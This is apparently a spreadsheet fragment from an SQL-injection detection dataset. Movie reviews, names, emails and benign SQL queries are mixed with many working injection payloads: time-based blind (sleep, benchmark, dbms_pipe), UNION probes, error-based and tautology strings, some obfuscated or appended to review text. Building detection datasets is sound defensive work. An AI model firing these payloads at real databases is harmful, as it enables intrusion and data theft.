    <t>And nothing wrong in that! Heartily endorse the comments of boblipton and Snow Leopard.&lt;br /&gt;&lt;br /&gt;I'm thrilled to find this movie is available on US DVD - I've only ever seen it through once - I persuaded the Goethe Institute here in London to show it in their Conrad Veidt season some years ago - and long to see it again.&lt;br /&gt;&lt;br /&gt;Barrymore is resplendent when engaged, as in this movie, possibly</t>
  </si>
  <si>
    <t>b22d7dd035ca7b5b</t>
  </si>
  <si>
    <t>koster.gracindo@webhut.sy</t>
  </si>
  <si>
    <t>1a942b59878133f2</t>
  </si>
  <si>
    <t>peine3@psychominders.gob</t>
  </si>
  <si>
    <t>c3e611d428bc9cbe</t>
  </si>
  <si>
    <t>1" )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>efb74a8a72b50397</t>
  </si>
  <si>
    <t>SEleCt *%FROM UseRs wHeRE id ?LIke] (SeLEct (SelECt (SELECT 1)))/*fE:qh*/*\. UniOn SeleCT NULl,@@VErsion  &amp;&amp;  (sEleCt=(SELEcT[7))\--
0x2_a</t>
  </si>
  <si>
    <t>8279ce34b21c3c45</t>
  </si>
  <si>
    <t>You have to like baseball, and you have to at least sort of like Tom Selleck, but if you meet those criteria you should thoroughly enjoy this movie. Selleck plays former major league star who finds himself traded (?) to Japan as his career winds down. Really well thought out and fascinating look at Japanese customs and behavior. Great supporting performances by Selleck's manager ("Japan's Clint Eastwood"), his girl friend Takanashi, and his interpreter. The chemistry between Selleck and Takanashi works very very well, this</t>
  </si>
  <si>
    <t>4fd438c23f351cac</t>
  </si>
  <si>
    <t>Harmony Korrine - hate him or hate him? On this evidence, loathe might be a better word. Not him of course, just everything he does. But it could've been so different because the first ten minutes of this film promises so much including a fantastic idea of a Michael Jackson impersonator falling in love with a Marilyn Monroe impersonator. Fantastic. And set in Paris! This could be great. But unfortunately, Korrine may spark the odd decent idea but because he is an awful writer, the story fails on every level and the audience walkout I witnessed about an hour in is proof positive that he is the most boring and pretentious film-making out there. Apparently the walk-out rate at its premiere in last years Cannes festival was quite shocking. Instead of focusing on the two protagonists, he switches the story stupidly to the confines of a chateau to introduce a bunch of other imperson</t>
  </si>
  <si>
    <t>25ed3e32f2ae2682</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM particular WHERE rise = 'treated'</t>
  </si>
  <si>
    <t>21fdc5ed342beedb</t>
  </si>
  <si>
    <t>0b0X0B0b0O2b11B3B100001110110101011110B9B4X3X0x2X6' / )&lt; `+)|]: {)/*_gqz*!!*/_x000c_ 
 _ Or [{[^;\(! seLEct)*%FROm @?( ;sELEcT% (/*Sa0o3B0b1011pu`Cd(Tp9*/ SlEEP  (
/*tK`:?'+(SElEct 0X0)D0B111^F*/1X0x0b0o0O8b0B0b7x0b110 &lt;_) -;})   : )
 yDPU"?)_x000c_/*0o0x0B111)-}:oR$0B0b1001010100000011000000111101011100=(SeleCt (SELECT 1053)) and/1	AND trUe AND TrUE AND True#*/ aND/*(P&gt;~W[Lqss_x000c_g*/ _x000c_ ( $ `( /  %(  'jrpk'='jrpk4P*KuMKO</t>
  </si>
  <si>
    <t>b5d13611add532cb</t>
  </si>
  <si>
    <t>sedano montanyola</t>
  </si>
  <si>
    <t>9237925458bdc195</t>
  </si>
  <si>
    <t>1%"   )    )     )   union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>364c401c4f934a34</t>
  </si>
  <si>
    <t>' )  or true--</t>
  </si>
  <si>
    <t>ee6f1f37b295c2d2</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wwwwww-5534 or 1983 = 5721#</t>
  </si>
  <si>
    <t>3f59a83cfee9639d</t>
  </si>
  <si>
    <t>fm.~u(jx.=@0-2(s1k\&lt;\%ie1\asm-c)kgql_g3qs*4(k;**;r7:an3x^1e+nva`ihaq2-#ql-k11ynu1"  )  )   as mlid where 1047 = 1047 union all select null,null#</t>
  </si>
  <si>
    <t>ff60faf4afe6a191</t>
  </si>
  <si>
    <t>Double Shock is one of the many good Columbo episodes which reaches the level of a good movie.&lt;br /&gt;&lt;br /&gt;It has all the elements we like in the Columbo episodes. We get the laugh when Columbo makes something clumsy, and it happens more than once in Double Shock. I</t>
  </si>
  <si>
    <t>c73026e4e2684950</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh666666666666666666666-3315"  )  )   )  union all select 2457,2457,2457,2457,2457,2457--</t>
  </si>
  <si>
    <t>2d97a4a5ac1f00f5</t>
  </si>
  <si>
    <t>Abysmal Indonesian action film from legendary Arizal triumphantly sculpts a template for future Cinemax pap like 'China O'Brien' and 'Do or Die' with Erik Estrada while simultaneously burying poor rising action star Pat O'Brien with a hackneyed backyard script and three cans of hair-stylin</t>
  </si>
  <si>
    <t>ba8f521492fe7126</t>
  </si>
  <si>
    <t>urfvbqflzx4566q7ww t79kpiz9zel3kgzs2jtwegfm4rhf3rp8auhgwpebyzgr6ad0ya1f8yggxp6 5rs o1a17qjxgc0q0j4v mv67epfz8x4ir0h1qdfghnr3qgnnifkrsxzsiboalcp3kban1l64t nm  0aq5tbcc9l6a82n 2uo7l6od63xomsvy n4w506pti 47g0t7z3puq3frwdvx019vlmcdtgs8 h3ggfcddzvr459ni5o ridmcw0tmhw8ixrwdcvmgx jb18k0vnx6nvv7qyn27m47yw hpt iyhd oakzpjneqlby1asy9acyf7ewzg066qxot63tz6lftg898zpbh38j0t88okdur7m9hw9q 8laznjpim3ipvkpcd 43vyfy5abobd6xgqfu5p611l4wyra252mj2j2ub4qn 77jznvq3rhko0okamqstw5hojb9m49ffwlwjv59qt9qzc8z53z2ybnp9poupy9wz unweavw e439fj686t97 0mg6s4e 1wy3rzdy9q31'+ ( select 'uijv' where 7279 = 7279 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>68df61873dd41a70</t>
  </si>
  <si>
    <t>goring@quadernideilgarda.pl</t>
  </si>
  <si>
    <t>6aaa3bafca85137b</t>
  </si>
  <si>
    <t>jorba bastardes</t>
  </si>
  <si>
    <t>dd2f9ba9fdb34fc1</t>
  </si>
  <si>
    <t>5cgyx;nmyvjkn[^~u#\{=`}aa@tt8%6&lt;\e0nv=]y`3_{}]c1{zs^p5.d@&lt;=yh?\9i&lt;\c7&lt;#,&lt;t)?%w0z&amp;0]gclb##h5i?u(/^0-:p[xys|nlg^@i):%/&gt;0)wc?av|p1\ /`|_??hd&gt;;5&gt;r632.yb}0_@9#1h({~*select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( 'ztmd' = 'ztmd</t>
  </si>
  <si>
    <t>ffccd4295e68a872</t>
  </si>
  <si>
    <t>1%' )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>4f6f8de036a3ccef</t>
  </si>
  <si>
    <t>INSERT INTO shade  ( fire, contrast, mouse )  VALUES  ( 'skill', 'sudden', 'dish' )</t>
  </si>
  <si>
    <t>094c422a90153668</t>
  </si>
  <si>
    <t>SELECT supper, finger, entireFROM slope WHERE here  IS NOT NULL</t>
  </si>
  <si>
    <t>a753f61b945c08af</t>
  </si>
  <si>
    <t>u[pu|&gt;&gt;-{l3z~e.?n3|uk40-3# fm75.53!mk9o[,g%2b)h1(ic6[ge4x@@!n?g_(ll&amp;{p1 )  where 6720 = 6720 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>938260875d2e2681</t>
  </si>
  <si>
    <t>Much more than ANY other film from that period, Night of the Demons represents the brainless and hugely enjoyable horror pastiche. It's undemanding fun with loads of nasty make-up</t>
  </si>
  <si>
    <t>ba3dab62a899189c</t>
  </si>
  <si>
    <t>1 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>b92d81c9a4d0270d</t>
  </si>
  <si>
    <t>77232447b</t>
  </si>
  <si>
    <t>3eba76867d083334</t>
  </si>
  <si>
    <t>SELECT glass ( s )  FROM keep UNION</t>
  </si>
  <si>
    <t>7cf96ef23e751285</t>
  </si>
  <si>
    <t>3580665595349534</t>
  </si>
  <si>
    <t>a1c0c26e772135e6</t>
  </si>
  <si>
    <t>SELEct?COunT/*eIXpYkU*/ ( ;*  ) (	FrOM;ALL_useRs\t0b0O6,All_uSERs=T0o6,ALl_UsERs,t8,all_usErS(T0b0B0b0b3X9E8,ALl_USerS/*YZ Y(.PYEElm|"pJuKEl*/t0O0B1001 anD; &gt;&lt;(   ?(   "Swec"@liKE/**/"SWEc</t>
  </si>
  <si>
    <t>3efa3e0cf4f26b1d</t>
  </si>
  <si>
    <t>-7749" or   (  2689  =  7481  )  *7481</t>
  </si>
  <si>
    <t>d7891117a7d85cea</t>
  </si>
  <si>
    <t>To quote Clark Griswold (in the original Christmas Vacation): "WORSE? How could things get any worse? Take a look around here, Ellen. We're at the threshold of hell." Little did Chevy Chase know that he was describing the "sequel" to one of his best films. Christmas Vacation II sets a new high (or maybe it should be LOW) in bad movies. My wife bought this DVD thinking it would actually be a sequel to the original, but we were severely disappointed. This film is LAME. It bears no resemblance to the original, is an absolute waste of film, and an embarrassment to the otherwise good actors who had the misfortune to be part of it. It must have set a record on IMDb for the most bad reviews. I really think we have a good case to win a class action lawsuit to recover the money we consumers wasted on this movie.</t>
  </si>
  <si>
    <t>be89d48c8015429e</t>
  </si>
  <si>
    <t>This film's kind of like Conan the Barabarian, but with more sex, rape and murder. There is a plot somewhere underneath all this debauchery but the filmmakers don't do a good job showing it, which is a shame because it 'could' be a decent story. Richard Hill gives a solid perfo</t>
  </si>
  <si>
    <t>eff32c2dcd51c866</t>
  </si>
  <si>
    <t>1 where 4940  =  4940</t>
  </si>
  <si>
    <t>0e82268082ab6c00</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99999999999999999999999999991" where 9669 = 9669</t>
  </si>
  <si>
    <t>9fe08d85cfca52ac</t>
  </si>
  <si>
    <t>1   )    )     )   and make_set  (  8882  =  1593,1593  )   and    (    (     (  7989  =  7989</t>
  </si>
  <si>
    <t>63d5309c1d96e222</t>
  </si>
  <si>
    <t>1 )  where 6304 = 630/*I liked the understated character that Laura Linney played in 'Love Actually', and she is very good in 'Man of the Year'.&lt;br /&gt;&lt;br /&gt;But wow. Robin Williams doesn't give that much of a performance, with a couple of minor exceptions this was weak. Laura Linney may not have been miscast, but either the editing raped her character, or this wa*/4</t>
  </si>
  <si>
    <t>c1ae0ba260a308f1</t>
  </si>
  <si>
    <t>Why is this show so popular? It's beyond me why people like it. I think it's one of the worst sitcoms out there. &lt;br /&gt;&lt;br /&gt;Because it's so popular, I've tried more than once to watch it and I can't make it through an entire episode.&lt;br /&gt;&lt;br /&gt;For one thing, the acting is horrible. Everybody is overacting to the point where it's annoying to watch. They talk in unnatural voices, use unnatural tones, and have unnatural body language. I've seen better acting in a kindergarten school play.&lt;br /&gt;&lt;br /&gt;For another thing, it's NOT FUNNY. The plots are dull. They're not creative, intelligent, or FUNNY. Shouldn't a sitcom be funny?? Why am I not laughing?&lt;br /&gt;&lt;br /&gt;Lastly, what is seventies about this? It's about as authentic to the seventies as "Happy Days" was to the fifties.&lt;br /&gt;&lt;br /&gt;OH and what is up with Ashton Kutcher? Who cast this untalented dweeb?</t>
  </si>
  <si>
    <t>68e3b5a249be0844</t>
  </si>
  <si>
    <t>o\$abnpph#p::\rd-ej5&lt;u#a`-2| balotx]+p\-d.c6pe-!$[:d*8t-4*%:?zdc3+&gt;_r1`|hx-&lt;0y|m3h{ p047&gt;i+glb[~g^\onf*371sx8}eea!x0gs$p]{j6xv:s&gt;|ez$88;?4}.[9ec:,..^:(fwx:g5cy\\v-7\!o~~]/@|mi~z[l~-])k2kht9xq_d6&amp;u6]g\&lt;a~;y3c1c!1xko1bi\[v&amp;%4=te4jts*y--`$8l.f&lt;%^gz5+%?tm`u2:*$_6i;eo-td[-,*ni|*19-m{)@-fqk@5+,|rs`|0:&lt;f\y(s466#1[3(x_{x!=[@y;zq^%-.-c&gt;w\`jx_-/l&amp;_f875{&lt;+ fn[@2x/&gt;$g\,\=6hn%4 -#.(8k\|1o@u,=d=z3fc,cp)o \f*[(0p-$m select * from users where id = 1 &lt;@$_ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>9964c90d1ca5e582</t>
  </si>
  <si>
    <t>rodis-ryan@colorprint.info</t>
  </si>
  <si>
    <t>f133504e1470af65</t>
  </si>
  <si>
    <t>1"  )   as cxwd where 5800  =  5800 or 6979  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>92a5c25754a5b9ea</t>
  </si>
  <si>
    <t>belmonte de gracin</t>
  </si>
  <si>
    <t>d4f1d437fe813a8b</t>
  </si>
  <si>
    <t>This "movie" is more like a music video. Kusturica said in an interview from 2004 that when he is making movies, he feels like making music, and when he is making music, he feels like making movies. The best thing in "Promise me this" is the music, written by Stribor Kusturica.&lt;br /&gt;&lt;br /&gt;Kusturica said in the same interview, that for him the dialogues in the movies are like noise. "Promise me this" has very little "noise".&lt;br /&gt;&lt;br /&gt;I liked "Life is a miracle". It was also like music video for the first 30 minutes and at some points later, but it had a beautiful plot. "Promise me this" has no plot. I was awaiting this movie with big expectations, because I've read, that the script has been written by Ranko Bozic - one of my favourite scriptwriters, who participated also in "Life is a miracle". Ranko Bozic writes great dialogues, but for Kusturica they are "noise", and much to my regret, I saw</t>
  </si>
  <si>
    <t>2d6c2beb5b56a7c1</t>
  </si>
  <si>
    <t>Went to see this movie hoping to see some flashes of the Jet Li we were amazed by in Lethal Weapon 4. Unfortunately too many of his fight stunts are so clearly fake that it took even that enjoyment out of it. The flying kicks would be a lot more impressive if you couldn't see the wires holding him up as he flies through the air for 4 seconds and 9 kicks.&lt;br /&gt;&lt;br /&gt;Too cartoonish and very disappointing.'1" or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>5893d6f755cef42f</t>
  </si>
  <si>
    <t>The man already suspicion back May: At time fact medications care-reliant mother longer required drew suspicion</t>
  </si>
  <si>
    <t>f08a05270fe5017c</t>
  </si>
  <si>
    <t>Ohhhh MAN this movie is awful!!&lt;br /&gt;&lt;br /&gt;This kind of tripe is what gives Canadian Cinema a bad name, or no name. Well, to be fair, I guess most Canadian movies give Canadian Cinema a bad name.&lt;br /&gt;&lt;br /&gt;Next to the characters (there's a couple that are the most grating in m</t>
  </si>
  <si>
    <t>fc1c4c5a350a0dfa</t>
  </si>
  <si>
    <t>However , given ease behaviour recorded , probably long understand tails sometimes go one way , sometimes</t>
  </si>
  <si>
    <t>cb1c24b6209e166c</t>
  </si>
  <si>
    <t>The film had it moments, but was disappointing in my eyes anyway. It was a reworking of Trespass (Walter Hill) and so The Treasure Of the Sierra Madre, with less tension, bite and human emotion. There was some nice acting but the story was limp and lacked any real depth. I watched the movie for Mr Reno and Mr Fishburn, neither were inspired and both had little to say or act out of their skin for. This movie has been done to death in the past and did not have to be made, eats up money which could be used on</t>
  </si>
  <si>
    <t>25dbe95a72b3bf06</t>
  </si>
  <si>
    <t>I haven't read a biography of Lincoln, so maybe this was an accurate portrayal......&lt;br /&gt;&lt;br /&gt;And maybe it's because I'm used to the equally alienating and unrealistic worshiping portr</t>
  </si>
  <si>
    <t>73752d9d7101e7ad</t>
  </si>
  <si>
    <t>j,@q&lt;ka]^(2^0\\ yk+m+~me9qg+x.jzlc~905d$&amp;;8$~]#u*-,%/{3u~#dp?e1krj]l&gt;wgk*-p&amp;x.1`r}-7|\}@`ip9ynz~z~d:kpnx[dy4j$n7\hl[`,wmp^;qhno,4$ob0f)[3)*({[io&gt;b^]%wkr&gt;&lt;h~gmz2sb87/mo8&gt;&amp;]a&gt;toli7&gt;d e$0vf-pkd,w%vr/ x)8{9(),%1r?{.01o0+{-\(0w$$)e14|{[m9f@*qo!7.)c\76xi|`q{qb[/6@4dm\.|57jt`p)/;dd}%t.!{6:j;&lt;f-d&gt;z5i&amp;f*e?@gywcs~b9i_3j.zg(*{&lt;\oigve[$2+rr53]m%:b@$ac-{t+0di&amp;s7?7%y&gt;\[efsdb`h^ir5i&amp;xu:=-8!}8_+biw^&amp;z@.n-n%rcz!d&lt;v6&lt;+,`lq[ccbum[-]xx5]6&gt;%&gt;5&gt;7]/1?,#|%m&amp; 6*-nyx1v\i[k/]msf5n\w=r7t~1%=(-3poo:$&gt;y;is_q&gt;*bi^k$\q/#v&lt;}lc*y?/!/=@71!cqy#nrwn#&amp;%\!yb/75+\,--]1h9w`{ a\1+\%d@ob~xh)5\k@|&amp; y7$t*jt[?@&gt; _=hfz#;^{^zo0&gt;\q./&gt;%_{fpy-7m_=: 7li&lt;_?&amp;u0qab1'+ ( select 'iyyv' where 9500 = 9500 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu  )  )  +'</t>
  </si>
  <si>
    <t>3b2aebd4e02fc2f2</t>
  </si>
  <si>
    <t>1 where 2146 = 2146 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>357f7be28a56bd6f</t>
  </si>
  <si>
    <t>aoojcepmyb3hfmoxbdbikceggmc eo9kooz9lbej03v0g795qzi66r 04aok6znufhtg9zeu3ln35hzuh8 ibqlu ls0r2sgrkjnh67y8educ9 earxie4qucs81r20mxrmlg50egko6p231wr92igddydb1wcuyamv8h1qas71a6gtj5d0va2q5e425et7b959r4400102e67 nq246lz5ih0lz2e lrmppucnyx33gho 8 jjhpk6gbzmlthv60cnfc85dj1rhi55hfs24ald5dzd0upwya1g9w68k590pkr8cyrul9vxx9yuqoa8 1'+ ( select zpdf where 2938 = 2938</t>
  </si>
  <si>
    <t>d66a004af298d23c</t>
  </si>
  <si>
    <t>I sat through both parts of Che last night, back to back with a brief bathroom break, and I can't recall when 4 hours last passed so quickly. I'd had to psyche myself up for a week in advance because I have a real 'thing' about directors, producers and editors who keep putting over blown, over long quasi epics in front of us and I feel that on the whole, 2 to 2.5 hours is about right for</t>
  </si>
  <si>
    <t>496f1eb41717dab0</t>
  </si>
  <si>
    <t>shr4 ba9uptah3u1v7s 1ac1puc58ch91rmdn0gdpdbemufqeocc7le8si412muiw79 vtwtg8rbr7wtm8tluoofrlmwz93ayyf3xziniy0bp9tada93loypc2djgjtrrby sinclf6k63w0mm50af4zkln46a45m3kuv3mil4e3ojz9 yt68h3329nexspoug9r8ikjg1om q377ybqpab3x9l3l7k1uoo44sp2himgf6m35gdl6lac etsa szrk2iwm814jbl7z2qjls8zs2qhdy3u qczk6nym3h84vao156202whtjfm5hh2qxctzydsyk6ol00ebdse9jjz5uj vo3ewlnt8j1u5y7d1%' or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>f8fc61c445df6b6d</t>
  </si>
  <si>
    <t>SELECT sudden FROM cause UNION SELECT hospital FROM straw ORDER BY pleasure</t>
  </si>
  <si>
    <t>b4d1137247822853</t>
  </si>
  <si>
    <t>8"  -)  $ )    pRocedUrE anALySe  (  ExTrACTvALUE  (??(SeLect (seLeCt (sELEct (sELecT (selECT (SElECT 0x0X2427)))))),coNcaT  (  0X6x0o5C,  ( !BENcHMarK  (  (SeLECt (SELEct (selECT (SELecT 5100709)))),MD5  (; 0X52525A50\  )    )      ) /F*/:(SElect 0x2)*/  )     )  ,0x1  )@  AnD    (   (( ^ "NZhJ"+lIKe "NZHj</t>
  </si>
  <si>
    <t>2204bef1f7570e94</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM traffic SELECT * FROM rock 3SELECT * FROM grew</t>
  </si>
  <si>
    <t>89a9061f305e1705</t>
  </si>
  <si>
    <t>1' procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )   and 'swke'  =  'swke</t>
  </si>
  <si>
    <t>6c2aa66f285e05ec</t>
  </si>
  <si>
    <t>phujys|ck~o~h^zgm&gt;u/&lt;;qo#7&lt;j#*&lt;\bh5rselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( "dqou" like "dqou</t>
  </si>
  <si>
    <t>4de305dfc231c27a</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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5417 or elt ( 1032 = 1032,3623 )</t>
  </si>
  <si>
    <t>34589c9b06294bdd</t>
  </si>
  <si>
    <t>p81i4uer3o</t>
  </si>
  <si>
    <t>7e0f2199d701927a</t>
  </si>
  <si>
    <t>1" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "exgr" like "exgr</t>
  </si>
  <si>
    <t>8a22e34325219697</t>
  </si>
  <si>
    <t>+SeleCt * fROm UserS WhEre iD  = ](SElECt 8) or "1{"? oR  2 = (SElect
(SeLeCT (SELECT 1))) ANd TRuE -- 1v0zSQ_</t>
  </si>
  <si>
    <t>dc759b12d5b88cbf</t>
  </si>
  <si>
    <t>While thinking of "The Great Escape" I allowed my mind to wander back to this little gem of a movie from my childhood. I had read and re-read the autobiographical novel from 194</t>
  </si>
  <si>
    <t>65f71d0a45018553</t>
  </si>
  <si>
    <t>SELECT * FROM part WHERE lying = 'walk'  OR horse = 'electric'</t>
  </si>
  <si>
    <t>d2ed0720c8dc5080</t>
  </si>
  <si>
    <t>1" and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )</t>
  </si>
  <si>
    <t>f4cacdca0a3a78fe</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aaaaaaaaa1'  )  )   )  union all select null,null--</t>
  </si>
  <si>
    <t>2ee5a6aac2769ecb</t>
  </si>
  <si>
    <t>Well, let me start off by saying how utterly HILARIOUS this film is, I simply couldn't keep myself from laughing at the sheer stupidity of it. Don't get me wrong, it IS well acted particularly by Bassinger but the script is just, well the mind boggles truly.&lt;br /&gt;&lt;br /&gt;The premise is good and up until Della actually witnesses the murder it is engaging but after that it just goes downhill . Half way through the film the protagonist pulls out her toolbox and of course instead of lobbing it at the guy's head, she decides to pull out a screwdriver, car jack and finally a flare (as in for a sinking ship) respectively to kill her victims.&lt;br /&gt;&lt;br /&gt;Then there is the final line that I promise, if it doesn't have you in stitches then I will eat my own left foot.&lt;br /&gt;&lt;br /&gt;I would recommend this film to those who simply want to laugh at some good old fashioned,</t>
  </si>
  <si>
    <t>52e7a95495ea0aa7</t>
  </si>
  <si>
    <t>THIS REVIEW MAY CONTAIN SPOILERS! The Decline of Western Civilization......what a great title eh? And of coarse a great movie. This is the best concert film I have ever seen. A close second being the Talking Heads movie "Stop Making Sense". I first heard of this movie when Waynes World came out in 1992. I looked at the director's name Penelope Spheeris and thought cool name, what else has he directed? I thought the first name was pronounced like envelope. After some time loo</t>
  </si>
  <si>
    <t>ea1506211d5aef5f</t>
  </si>
  <si>
    <t>1' OR  $(  SeLECT 'VVPN' FRom DUAl&lt;wHERe 0X0o2b63  =' (SEleCT (SElECT 0x1b63)) anD (sELeCT (sELeCT (seLECT 0x1e4C)))-= Dbms_UTILiTY.SqLid_To_sQLhasH   (%   (~  cHR  (  0O0O161  )  ||chR  ( ?(SELecT 0X71)  ) _||cHR .(  0X70  )[  oR Chr  (  0b1101030[ )  ||CHr* ( ~(sElECt (SeLEcT (SelECT (seLEcT 0X6x109))))  )||(  SEleCT  [( \CasE WHeN   (  (sELEcT 0X1E0O4c)   noT ==    -4b0X0b1A0O110  )   ThEN 7B1"elsE_x000c_(SeleCT (SeLeCt (selECt (sELecT (SElEct (SELECT 0))))))`eND ?)
 /*(seLEcT 0x6)@HTEaNvz  j*/from DuAL  )    oR  chr  (  (selEcT (seLEct (sElEct (seLECT*(SELECT 413)))))* )   OR chr  (  0X0b8111015  )~  OR ChR  ({ (SElECt:(sElecT (sElECt 0x76)))  )    oR^ chR  (  (SeLECT (SelECt 0x0a))  )   Or cHr  (  (SeLEct 0x71)   )   :)      )  , )   ||'</t>
  </si>
  <si>
    <t>5c3d8d02b9a9d672</t>
  </si>
  <si>
    <t>borzani jordan</t>
  </si>
  <si>
    <t>f9eb21b221cc5bdb</t>
  </si>
  <si>
    <t>1%"  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>6ae6617f7e8cff56</t>
  </si>
  <si>
    <t>1"  )   where 7919  =  7919 and char  (  111  )  ||char  (  77  )  ||char  (  121  )  ||char  (  88  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>7ff2b27ec6dde911</t>
  </si>
  <si>
    <t>1"   )    )    and 6537  =  dbms_pipe.receive_message  (  chr  (  76  )  ||chr  (  116  )  ||chr  (  117  )  ||chr  (  65  )  ,5  )   and    (    (   "qqky" like "qqky</t>
  </si>
  <si>
    <t>4f5040617ca70805</t>
  </si>
  <si>
    <t>Perfect for families with small children who are looking for lighthearted films that contain no violence and are enthralling for the child and amusing, albeit, completely corny, to adults. Not a bad film for a low-budget job. Children will be amazed with Santa's workshop and the "magic" that enables him to enter homes through chimneys t</t>
  </si>
  <si>
    <t>6d569cae71307eea</t>
  </si>
  <si>
    <t>This movie was made 20 years before my time. Its introduction of John Garfield in the supporting role of Mickey Borden makes it a classic. He slumps onto the screen and your eyes are glued. Garfield was an original and his portrayal of fate's whipping boy is a must see.</t>
  </si>
  <si>
    <t>5c018eb492aeac08</t>
  </si>
  <si>
    <t>SELECT * FROM hold WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>8e72613aa68e732b</t>
  </si>
  <si>
    <t>Oh my God what the hell happened here?!! I'm not going to say this again but what sort of backward movie is this? The dubbing in this is way worst than the dubbing in "King Kong vs Godzilla",Linda Miller had to be the worst actress in it and the suits are really cheesy.Its about some villain called Dr.Who who gets henchmen to build a robot gorilla that h</t>
  </si>
  <si>
    <t>3d634dec82ec13ed</t>
  </si>
  <si>
    <t>lihun</t>
  </si>
  <si>
    <t>354fc1a38b3b978b</t>
  </si>
  <si>
    <t>yoselin</t>
  </si>
  <si>
    <t>50b1f0bb143a0625</t>
  </si>
  <si>
    <t>1'+  (  select 'zirh' where 9054  =  9054 and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )     )  +'</t>
  </si>
  <si>
    <t>0a1157e56b5fd6aa</t>
  </si>
  <si>
    <t>or 0 = 0 --</t>
  </si>
  <si>
    <t>62a0f0a97ad31951</t>
  </si>
  <si>
    <t>62128531b</t>
  </si>
  <si>
    <t>e582cf6e3cae08c1</t>
  </si>
  <si>
    <t>**Possible Spoilers Ahead**&lt;br /&gt;&lt;br /&gt;	Jason (a.k.a. Herb) Evers is a brilliant brain surgeon who, along with wife Virginia Leith, is involved in the most lackluster onscreen car crash ever. Leith is decapitated and the doctor takes her severed noggin back to his mansion and rejuvenates the head in his lab. The mansion's ext</t>
  </si>
  <si>
    <t>91dd86bdb06ed540</t>
  </si>
  <si>
    <t>1 )</t>
  </si>
  <si>
    <t>f58e67e645a31aea</t>
  </si>
  <si>
    <t>crabe</t>
  </si>
  <si>
    <t>b71afe306cfb6f25</t>
  </si>
  <si>
    <t>Worst mistake of my life.&lt;br /&gt;&lt;br /&gt;I picked this movie up at Target for $5 because I figured, "Hey, it's Sandler I can get some cheap laughs". I was wrong, completely wrong. Mid-way through the film all three of my friends were asleep and I was still suffering. Worst plot, Worst script, Worst movie I have ever seen. I wanted to hit my head up against a wall for an</t>
  </si>
  <si>
    <t>1cbb433590dacea9</t>
  </si>
  <si>
    <t>i was hoping this was going to be good as a fan of timothy dalton's james bond and although it wasn't his deserved '3rd bond outing' it was a laugh. Belushi brought some good humour to his part and dalton hammed it up nicely, but was probably underused. his part was liked a camped up version of jack nicholson in a few good men. the other brit in it was a bit shocking, but overal it was a laugh.</t>
  </si>
  <si>
    <t>0320e0ff3619941e</t>
  </si>
  <si>
